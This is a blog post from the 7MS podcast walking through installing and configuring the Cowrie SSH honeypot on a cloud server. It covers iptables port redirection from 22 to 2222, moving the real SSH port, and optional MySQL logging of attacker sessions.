7MS #176: DIY SSH Honeypot with Cowrie
3 min read Podcast, diy

7MS #176: DIY SSH Honeypot with Cowrie

Recently I covered the Kippo SSH honeypot (part 1 | part 2) and a few folks brought to my attention that this project was a little long in the tooth, and had been superseded by Cowrie.

This past weekend I got Cowrie installed on my Digital Ocean droplet. Below is the quick and dirty instructions I followed to get it running (basically an abbreviated version of the official INSTALL.md.

First, grab the pre-reqs:

sudo apt-get install python-twisted python-crypto python-pyasn1 python-gmpy2 python-zope.interface

Then add a user for Cowrie to run under:

sudo adduser --disabled-password cowrie

(Put in whatever you want for first name, last name etc.)

Change to the Cowrie user:

sudo su - cowrie

Download Cowrie:

git clone http://github.com/micheloosterhof/cowrie

Change to the dir you just made:

cd cowrie

Copy the general config file to an active one:

cp cowrie.cfg.dist cowrie.cfg

Edit it:

pico cowrie.cfg

All I did at this point was change my hostname to be something a bit more appetizing:

Hostname = mailserver

Important note: Cowrie listens on port 2222 by default. Below I'm going to show you how to create a NAT rule to forward requests destined for 22 to 2222, but if you'd rather "hard code" this, read the portion of the INSTALL.md that talks about using authbind for this purpose.

Exit to root user:

exit

Open etc/ssh/sshd_config and change port 22 to some odd port you want to use for legit SSH management, like 9999 or 1357.

Reboot, and then for the next steps, I found it easier to connect directly to the Digitalocean.com SSH console, as we'll be tinkering with active iptables rules which may disconnect your existing SSH session.

First, list all your iptables rules (I find working with line numbers is easier, so I do):

sudo iptables -L --line-numbers

Allow JUST yourself to SSH to the port for true system management. In this example I use port 6996:

sudo iptables -A INPUT -p tcp -s F.Q.D.N --dport 6996 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT

Next, ensure there's a rule setup to allow
"anybody" to SSH in on port 22:

sudo iptables -A INPUT -p tcp --dport 22 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT

Also make sure there's a rule setup to allow "anybody" to SSH in on port 2222:

Allow ANYBODY to also hit port 2222: sudo iptables -A INPUT -p tcp --dport 2222 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT

Setup NAT rule to get 22 redirected to port 2222:

sudo iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

If you goof up like I did you can remove a NAT rule by listing existing NAT rules:

iptables -L -t nat --line-numbers

Then find rule you want to nuke (let's say it's #3) and do this:

iptables -t nat -D PREROUTING 3

Make changes to iptables persistent by issuing:

sudo iptables-save > /etc/iptables/rules.v4

Change to Cowrie user, enter cowrie dir and start cowrie:

sudo su - cowrie

cd cowrie

./start.sh

From there, you're pretty much good to go with a default config. Here are some interesting files/folders to note:

  • dl - this folder has copies of files that "hackers" download during their session.

  • utils/playlog.py - plays back user sessions in an asciinema style presentation.

I also setup mysql integration using this site as a guide:

First, do a ./stop.sh (in same dir as start.sh) to stop Cowrie.

Next, do a mysql -u root -p to get connected to mysql, then:

CREATE DATABASE cowrie;

GRANT ALL ON cowrie.* TO cowrie@localhost IDENTIFIED BY 'some-awesome-password-you-pick';

exit

Then connect as the cowrie user from the cowrie folder and import the .sql file:

mysql -u cowrie -p

Provide your awesome password when prompted

USE cowrie;

source ./doc/sql/mysql.sql

exit

Now open cowrie.cfg and update the blurb on mysql info. Be sure to uncomment this chunk of lines or stuff doesn't work :-)

Finally, switch to Cowrie user, go to cowrie dir and fire it up!

sudo su - cowrie

cd cowrie

./start.sh